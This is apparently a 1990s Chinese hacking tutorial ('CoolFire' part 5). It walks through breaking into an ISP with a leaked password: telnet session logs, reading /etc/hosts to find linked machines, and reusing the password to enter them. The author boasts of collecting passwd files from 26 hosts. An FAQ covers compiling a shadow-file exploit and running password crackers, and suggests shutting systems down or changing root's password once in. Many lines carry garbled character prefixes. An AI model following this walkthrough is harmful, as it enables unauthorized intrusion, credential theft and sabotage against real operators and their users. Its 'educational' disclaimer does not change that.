如何破解系統(tǒng)(5)

這不是一個教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!
- M/ C5 V2 |- D/ ]4 V
各位新年還愉快嗎 ?? 有沒有人過年還死守著電腦的呀~~ 該出去活動活動羅~~ 當(dāng)然,過完了年我們有有新的功課要作羅, 在過年前有一位網(wǎng)友 Mail 了一份 passwd 過來,我也因此找到了某家站臺的密碼, 經(jīng)深入研究過之後, 決定產(chǎn)生這一篇文章, 大家先熱身一下吧!!等一下就會有好戲喔~~

: k* t' V6 m, i1 p& z7 ?
- Z6 \* v, r8 c4 c9 R& _本次主題: 善用你所得到的任何資訊 (Exm: HOSTS 檔)
" Q" _% m2 Y3 X) I: D+ B- s) f連接位址: xxx.xxx.xxx.xxx (又馬賽克啦)
特別說明: 因?yàn)樵撜九_是一個 "很大" 的 網(wǎng)路提供者, 其服務(wù)地區(qū)遍及全亞,
所以必須要特別以馬
賽克來處理, 希望網(wǎng)友們不要介意 (咱們重的是內(nèi)容嘛!! 又不是..
那個.. 那個).

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
9 S" ~7 A! t! ]2 M+ `# s/ C**** 課程開始 ****
/ R8 j: T. T" T1 E3 `
首先說明的是, 這個網(wǎng)路提供者的服務(wù)項(xiàng)目,包含了撥接及傳真還有幫其它業(yè)者架設(shè)網(wǎng)路等, 也就是說如果我們能夠善用他們的系統(tǒng)就可以免費(fèi)傳真羅 ?? 哇哩... 國際傳真耶,這間公司不就虧大了!!!!!所以馬賽克處理是必要的, 不過這次的課程不是說明這個 ISP 夠大,而是我們?nèi)绾卫靡唤M已經(jīng)破解的密碼來入侵其它與其相連的主機(jī), 這點(diǎn)是比較重要的!!
" Z& ^; I7 p1 @
  r/ g( S  m4 F2 ^$ X( r; A6 X大家可能早就已經(jīng)知道, 在 Unix 系統(tǒng)中 /etc 目錄下的 hosts 檔案的作用了,我們今天就來談?wù)? 知道的人跳過去吧!! 如果使用 Windoz 95 的人, 也可以看看在你 95的系統(tǒng)目錄中也有一個這樣子的檔案, 他是長得像這個樣子的: 127.0.0.1 localhost FETAG , 表示 127.0.0.1 為LocalHost 也就是 FETAG 的電腦, 所以我們要找與該 Unix 有 "直接關(guān)系" 的主機(jī)可以由這個地方找到.
$ K& n: N8 V6 g7 s0 a1 q6 f/ \
# x4 m0 k# G' q! h1 o找到這些主機(jī)有甚麼用呀 ?? 繼然你已經(jīng)有了一個主機(jī)的密碼,當(dāng)然其它的主機(jī)也可能會有相同的User 在其它的主機(jī)上用同樣的帳號, 而且依據(jù)經(jīng)驗(yàn)來說,他們在其它主機(jī)上的密碼通常都跟你目前所擁有的這一份是一樣的, 也就是你可以用同樣的一組密碼游走於其它的主機(jī)!!
以下示范的這個例子就是啦!!
4 `0 y9 ^* q; ~! Y  A3 J: V
www:/etc$ telnet Superman.com.tw
Trying 222.111.111.111...
1 D0 X& T5 l8 |. [% ~" lConnected to Superman.com.tw.
Escape character is '^]'.
8 Q8 c" T" v: o. N8 m* m+ F: k5 `5 E
Linux 1.2.8 (Superman.Superman.com.tw) (ttyp0)
" q$ L9 Y" L9 k- r! d6 ](甚麼爛公司, 新版系統(tǒng)的 Bug 少多了, 還不更新~~~)
. l. N0 }( i, D

3 v- f- O8 ]1 K) T2 H+ o, l4 Y+ uSuperman login: amywang
0 M/ Y1 Z3 h0 z$ RPassword:

: w  C& N! ^) e8 l4 \" u(用你所知道的密碼進(jìn)入)

# r/ s+ x) I7 N, O0 uLinux 1.2.8. (POSIX).
You have new mail.
0 x' c9 ]: l: k# E) G+ T
(不要偷看人家的信喔)
: a: n% M. k: @6 j) n
Superman:~$ cd /etc
Superman:/etc$ cat hosts
+ Y6 x3 [" N5 y" W8 G0 y5 V1 ?
4 l$ W# t1 o- M6 M(直接深入今天的主題)

# For loopbacking.
127.0.0.1 localhost

- f  @5 R9 r: u  ~# `# v8 ^* ]222.111.247.1 router
222.111.247.2 abcdf01.tpfoo.Superman.com.tw abcdf01 f01
222.111.247.3 abcdf02.tpfoo.Superman.com.tw abcdf02 f02
2 d% k4 \  |$ Q1 _  F. }- j1 k222.111.247.4 abcdf03.tpfoo.Superman.com.tw abcdf03 f03
1 p/ A# Y: ], M# |  R; N: o+ M222.111.247.5 abcdf04.tpfoo.Superman.com.tw abcdf04 f04
0 b4 [, w( G; _  A1 I
207.121.0.15 abcdhk1.planet.com.hk abcdhk1 hk1
2 J7 w2 @$ i0 v$ _0 G
& _8 z* C0 r' e8 k: J: Y- U4 f* N222.111.248.2 abcdf11.tcfoo.Superman.com.tw abcdf11 f11

) o6 @% q4 ^2 @8 w222.111.248.3 abcdf12.tcfoo.Superman.com.tw abcdf12 f12
222.111.248.4 abcdf13.tcfoo.Superman.com.tw abcdf13 f13

222.111.248.131 abcdf21.ksfoo.Superman.com.tw abcdf21 f21
222.111.248.132 abcdf22.ksfoo.Superman.com.tw abcdf22 f22
" v  `6 n+ |2 \2 \0 h7 N& Y% a222.111.248.133 abcdf23.ksfoo.Superman.com.tw abcdf23 f23
222.111.248.134 abcdf24.ksfoo.Superman.com.tw abcdf24 f24
2 e8 ]9 ?+ W7 j" w$ X% }9 q' L/ ]6 L
+ C& E- ~( B& i7 y- w222.111.247.33 abcdf01-s1.Superman.com.tw abcdf01-s1 f01-s1
222.111.247.33 abcdf02-s1.Superman.com.tw abcdf02-s1 f02-s1
222.111.247.34 abcdts2-s2.Superman.com.tw abcdts2-s1 ts2-s1

$ ?3 ^4 V. e2 D. {  k222.111.247.193 abcdf11-s1.Superman.com.tw abcdf11-s1 f11-s1
, r! t0 s- X2 k% a222.111.247.193 abcdf12-s1.Superman.com.tw abcdf12-s1 f12-s1
- P' ]6 P: a, I5 L& i' [& z7 B222.111.247.194 abcdts1-s1.Superman.com.tw abcdts1-s1 ts1-s1

0 [4 S  W7 A( _5 r$ U222.111.247.73 abcdf21-s1.Superman.com.tw abcdf21-s1 f21-s1
222.111.247.197 abcdf22-s1.Superman.com.tw abcdf22-s1 f22-s1
* S2 C7 I3 ^' ~: F, K, o0 f222.111.247.198 abcdts1-s2.Superman.com.tw abcdts1-s2 ts1-s2

( y3 D  l9 C! c) d- J, F. n7 s222.111.247.201 abcdus1-s1.Superman.com.tw abcdus1-s1 us1-s1
222.111.247.77 abcdus2-s1.Superman.com.tw abcdus2-s1 us2-s1
222.111.247.78 abcdts1-s3.Superman.com.tw abcdts1-s3 ts1-s3

222.111.247.133 abcdts1-l0.Superman.com.tw abcdts1-l0 ts1-l0
! O  I6 P2 E# @/ W222.111.248.10 abcdts2-l0.Superman.com.tw abcdts2-l0 ts2-l0

#206.222.170.2 abcdus1.Superman.com.tw abcdus1 us1
#206.222.170.3 abcdus2.Superman.com.tw abcdus2 us2
) n6 U* w, x+ s. {" G% z, }1 O% c$ j9 t206.222.170.4 abcdus3.Superman.com.tw abcdus3 us3
/ E; b1 L9 e3 R+ M9 E% X4 z! X206.222.170.5 abcdus4.Superman.com.tw abcdus4 us4
206.222.170.7 abcdus1+.Superman.com.tw abcdus1+ us1+ us1
206.222.170.6 abcdus2+.Superman.com.tw abcdus2+ us2+ us2
6 B' C; q& R1 F/ |3 I1 x! M* d/ \
' N- C: Y; |6 B; n6 [
( H( x2 p: m% U/ E' B222.111.247.131 linux01.Superman.com.tw linux01 x01
/ t8 }; C8 L: L" v222.111.247.135 linux03.Superman.com.tw linux03
222.111.247.151 linux04.Superman.com.tw linux04 x04
5 k( f% M$ H# A& P5 L222.111.247.132 linux02-l0.Superman.com.tw linux02 x02
5 t6 \; m8 _( ^* r! c* z222.111.111.111 Superman.Superman.com.tw Superman
222.111.27.153 pc3.Superman.com.tw abcdpc3 pc3
  l" {8 g* H5 X! @222.111.27.152 pc2.Superman.com.tw abcdpc2 pc2
222.111.27.147 brian.Superman.com.tw brian brian
222.111.27.148 linuxpc.Superman.com.tw linuxpc hsliao
220.65.11.1 knet01
203.127.230.243 fooServer.warpdrive.com.sg sgp02
! R! q1 Z8 y7 p' R  d# End of hosts
2 ^& v+ R. T2 C! o0 K! |
! y: i9 D' z$ n& ]* i(我已經(jīng)盡量在馬賽克了!! 如果有沒有馬賽克完全的地方, 請?jiān)摼W(wǎng)路業(yè)者見諒)
9 b( s: D# X, S( I( v- Y(因?yàn)槭?Telnet LogFile 直接收錄的嘛~~ 唉.. 誰叫你的系統(tǒng)這麼脆弱~~)
7 |  }- W' K! \
Superman:/etc$ telnet 220.65.11.1
: S6 D5 Z, K  l5 G! a0 \Trying 210.65.33.2...
( y+ M6 e! e8 H, ]6 A! [! {6 d. iConnected to 210.65.33.2.
, U& T# Y( |8 D* L3 G  GEscape character is '^]'.
! G) i: |, t% w5 O
& j' {" j) x0 |. vLinux 1.2.8 (snet01) (ttyp2)


knet01 login: amywang
Password:
9 L3 q+ G; T) F2 L( H: J
Linux 1.2.8. (KNET01).
You have new mail.
% ^8 X5 i* w. X) Q
(進(jìn)來了! 就是這樣啦!!!!!!)

用了這種方法對該主機(jī)所連接的各點(diǎn)作測試,找到了一個可以使用所有主機(jī)的帳號及密碼檔案, 我用這個帳號抓了 26 臺主機(jī)的 /etc/passwd, 現(xiàn)在我的機(jī)器還在使用 CJack 對這 26個密碼檔解碼中, 如果有更進(jìn)一步的消息, 我們會在下一篇的時(shí)候一并討論,當(dāng)然這個方法不僅適用於這間公司, 對其它的主機(jī)也都適用, 這間公司的規(guī)模應(yīng)算不小了, 臺灣; 香港; 曰本都有分公司的樣子,不過也都.... 呵~
3 j6 R. M9 q+ W6 @8 c
% s6 Q# _; u- l以上就是 hosts 檔的妙用了!! 可能在此篇發(fā)表之後大家都用 DNS 了, 而不再編輯 hosts檔了~~~ 不過這個檔案也可以鎖起來呀~~ 限定只有 root 可以用嘛! 反正一些爛 ISP 不是都這樣,
8 G  r2 Z# h( U9 B一有安全顧慮就限定使用者的使用... 老套了啦!! 你還是會有其它的漏洞的... Linux 1.2.8 哈哈~~~多的是漏洞哩!!!!就算你把 hosts 也鎖起來, passwd 也 shadow..還是有一大堆的地方是歡迎大家進(jìn)入的~~~

嗯.. 沒有挑釁的意思啦~~ 各位親愛的網(wǎng)路提供者... 請將您的系統(tǒng)加鎖,以免有任何不測. 上次我們說的那個 ISP (WWW Server 有漏洞的那個), 這次已經(jīng)將 root 的密碼改掉了,但是還是留下許多 User 的密碼沒有改, Password 檔也沒有作任何的保護(hù), 對於這樣的業(yè)者, 哪一家公司的 HomePage 敢放在上面呢 ?? 被人亂改一通不是破壞了公司的形像嗎 ??

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 又是字典檔 ****

! w2 f$ v7 A; N" v* T, ^這次字典檔的部份不再多談了, 講講上一次的一點(diǎn)漏失,由於上次寫出來的程式太多地方?jīng)]有先作考慮, 所以用起來怪怪的 !! 再加上很多的功能沒有加上的關(guān)系,有很多網(wǎng)友反映出來的問題多在自己操作上的錯誤, 呵~~ 怪寫程式的人沒有作好一些檢查的動作嘛~~
  l, A! {- m6 f% a
, h0 {1 m+ E( [/ I6 X& d所以 CoolFire 決定將上次那個鳥程式重新寫過, 配合排序及檢查重覆的功能來使用,預(yù)計(jì)由今天晚上開始動工寫出字典檔的產(chǎn)生器, 這樣才對各位網(wǎng)友們有個交待, 喝呵...不過網(wǎng)友們別抱著太大的希望, 因?yàn)?James 的 LetMeIn! 2.0 也還在大家的期盼下久久未見,每天加班的他也實(shí)在沒甚麼時(shí)間,CoolFire 能在甚麼時(shí)候?qū)懞? 也是未知數(shù). 不過請各位 Mail給我你對此字典檔產(chǎn)生器的意見, 還有你希望它能在甚麼作業(yè)系統(tǒng)下動作 ?? DOS ?? Windoz ??

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
9 U! d* a% K, U
/ ?8 I( ^% x0 [9 Z**** CoolFire FAQ ****

實(shí)在很想幫大家解決問題, 但是請不要寄來 "請幫我 Crack xxx ISP" 的信件,如果我們的 Home Page 有甚麼問題, 或是你在 Crack 所遭遇到的問題, 歡迎大家來信討論!! Harlem Liang網(wǎng)友所建議的 StarKrack也是一個不錯的 Password Crack 軟體, 請大家也幫忙試試喔~~~~

$ t$ [5 B3 q8 `: X[Q1]你在 Coolhc~4 中講到 Shadow.c 可以用 unix 里的 cc 指令 但如何 Keyin 例如:
ms.hinet.net/harlem/>CC之後呢?
[A1]在 Unix 系統(tǒng)中下以下的指令: cc -o deshadow shadow.c 最後所產(chǎn)生出來的deshadow 就是執(zhí)行檔名了Unix 是一個不錯的系統(tǒng), 尤其是想要學(xué)習(xí) Crack Password或入侵的中H都一定躑n經(jīng)過這個門檻, 大家可以多看看一些有關(guān) Unix 的書籍, 當(dāng)然 c 語言也是其必須的羅~~~:)

/ |5 _' J8 A! n) P[Q2]deshadow 是在 Unix 下執(zhí)行,還是在Dos下執(zhí)行, 用 C 語言可不可以轉(zhuǎn)換?可不可以把shadow的 passwd拿回來再轉(zhuǎn)換?[A2]呵~~ 既然 /etc/passwd 已經(jīng) shadow 了! 你拿回來的當(dāng)然是沒有用的密碼檔,只能知道其 user 的名字而已, 所以如果要拿回來 Crack 當(dāng)然是不可能的, 而 DeShadow 是針對 Unix系統(tǒng)的漏洞所設(shè)計(jì)的,且只能在 Unix 上嘗試 DeShadow.. 故請?jiān)?Unix 上 Compiler 再執(zhí)行,當(dāng)然有些系統(tǒng)可能已經(jīng)將漏洞補(bǔ)上了, 或因?yàn)榫W(wǎng)路安全的問題不提供使用者編譯檔案,那就只好使用其它方法羅~~~:)

[Q3]我找到root的密碼了! 用kOS的字典檔XXXX的etc/passwd 用Star Cracker,只花了1小時(shí)30分 就找到了!找到root的密碼可以做甚麼呢? 你有沒有用kOS crack XXXX的 passwd花了多久time?[A3]哇 !! 恭喜你羅!(注: XXXX 部份為 "馬賽克" ) 找到 root 的密碼後能作甚麼 ???
  k3 z8 k9 k. |1 Z* T* x' I呵.. 隨便你羅, 想要作甚麼就作甚麼, 當(dāng)然可以更進(jìn)一步的得到更多的東西,你可以任意修改系統(tǒng)(小心觸法), 也可以在心情不好的時(shí)候把系統(tǒng) "關(guān)" 起來, 不讓別人上線, 亦可以更改 root 的密碼,讓他們的 root 沒有辦法維護(hù)系統(tǒng), 反正系統(tǒng)是你的了! 問我能作甚麼 ?? 我也不能回答你..... :)我當(dāng)然也 Crack 過, 不過時(shí)間嘛... 沒算, 因?yàn)槲叶际怯煤脦着_電腦在跑的 (利用下班時(shí)間),所以操作環(huán)境跟你不同羅!!
! m; `5 L  k$ t7 _% s
8 z/ {3 [, G) G" [6 i[Q4]看hopenet知道linux的bin/login中有一個很大漏洞可以取得root的權(quán)限是怎麼一回事呢?
[A4]該文章附有一 URL 位址, 請連上去看看後就知道了, 現(xiàn)在也有許多人討論這些東西,不過很多公司用的 Linux 都還是 1.x.x 版的, 很好 Crack... 試試吧! 保證你會愛上它~~ 呵~
, n$ t  E  t; ^* ]( C  i, k
[Q5]Cyberspace是什麼樣的組織?
  I5 _; y5 y1 [* v# Z[A5]嗯 ?? 連這種問題都有人問呀~~~ 請到 www.cyberspace.org 看看就知道羅~~~
% S3 T5 z2 h- @9 Z1 Z2 d
[Q6] I have a question for the 'GZ' file format.
[A6]對呀!! 放了字典檔的連結(jié)在首頁上就出現(xiàn)了很多問 .z .gz 檔要怎麼解的問題了,我的系統(tǒng)安裝了 Winzip, Pkunzip, Gzip 後 .z .gz 就變成 Winzip 可解的檔案了,知道該怎麼辦了吧~~

[Q7]我日前從你的站臺連至GlobalKOS下傳jack14的輔助工具,不過我的連線速度太慢,所以一直
. {" I' G2 z- k: `& U! A抓不回來,你可以 mirror 回來嗎?[A7]這種問題我也只好 Say "SORRY" 羅, 我們的首頁上已經(jīng)放了很多東西了,而且也都是開放讓同好們 "免費(fèi)" 參觀及抓取 (絕不收費(fèi)啦!!), 且一個 kOS 就要 1.xxMB 那麼大,我基於要放更多東西的關(guān)系提供了一個 Hot Link 在上面, 請各位 "努力" 吧!!不然換條線試試, 你用的可能是學(xué)術(shù)網(wǎng)路吧!! 可不可以在非巔鋒時(shí)間抓呢?? 還是弄個 ftp Server 幫你抓,信箱夠大的話可以用 Mail FTP... 等, 都可以達(dá)到你的目地的~~~:)

[Q8]我去找到了一個站的密碼檔,之後我執(zhí)行JACK卻出現(xiàn) Virtual mode not supportedwithout VCPI的訊息,請問是什麼錯誤?[A8]這位網(wǎng)友可能是使用 Windoz 95 的 DOS BOX 所出現(xiàn)的訊息吧!! VCPI 要在EMM386.EXE 掛上後有效, 也就是說最好在純 DOS 下掛上 EMM386.EXE 再使用 Crack Jack,另外使用的時(shí)候也不要在 EMM386.EXE 後下 NOEMS 的參數(shù), 不然 CJack 也不會理你, 至於怎麼在Win95 的DOS BOX 中使用 CJack ?? 我也不知道! 有沒有人試成功的, 請出個聲吧!!

[Q9]我如果由www得到密碼檔,破解之後我要從那輸入密碼?
[A9]嗯, 很簡單呀!! 啟動你的 Telnet 軟體 (NetTerm... Telnet... etc.) 連線到www.xxx.xxx.xxx 去, 然後就可以輸入密碼, 依正常程序 Login 就成了!! 加油喔~~ Enjoy Hacking~:)
[Q10]我無法將字典檔抓下來, 可否用E-MAIL寄給我
[A10]........ 誰來幫我回答~~~~?
% i  |: P/ e( s2 O$ }

4 ~: R1 m" X7 d/ S0 E8 j**** 後語 ****

7 d! O* W% F7 c# Q+ O作這份東西的動機(jī)是 "興趣", 入侵到他人的主機(jī)是屬於非法的行為?但是我并沒有作任何的破壞動作, 純粹就是 "好玩", 當(dāng)然也因此突顯出許多站臺的安全性問題,所以這份文章也就有點(diǎn)"教育"這些破站臺的意味存在. 有許多的網(wǎng)有對 CoolFire 充滿了信心, 寄了許多站臺的網(wǎng)址來"求破",呵.. 我只能看看, 不能夠?qū)⒚刻斓男牧Χ纪蹲⒃谏厦? 網(wǎng)友們也許比較有時(shí)間吧!!大家可以一起到 Hacker 論壇討論討論.

1 E! C1 e, _5 `- Q我們的首頁感謝大家的支持, 現(xiàn)在人數(shù).... 呵, 已經(jīng)不準(zhǔn)了!不曉得是哪位網(wǎng)友跑到咱們的 Cgi-Count去動了手腳, 原本過年前還在 32xx 的人, 現(xiàn)在已經(jīng)倒退了, 暫且不管網(wǎng)友們是如何想的,下次若再出現(xiàn)這樣的狀況, 這個首頁可能因此關(guān)門大吉羅~~~
1 @+ Z3 ?# z) [- s" I) V# e
" I$ a2 ^# a1 w** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會完全關(guān)閉, 再
也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識",不要利用它來奪取任何的"權(quán)利", 本首頁著重的是教育, 而不是一　的教導(dǎo)攻擊的方法, 希望大家對於政府機(jī)關(guān)(org.tw) 或教育機(jī)構(gòu) (edu.tw) 不要作任何的破壞!! 還有我的 ISP......:D
謝謝大家的支持~

------
再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!
1 [: @/ U2 Z8 D9 ^6 ?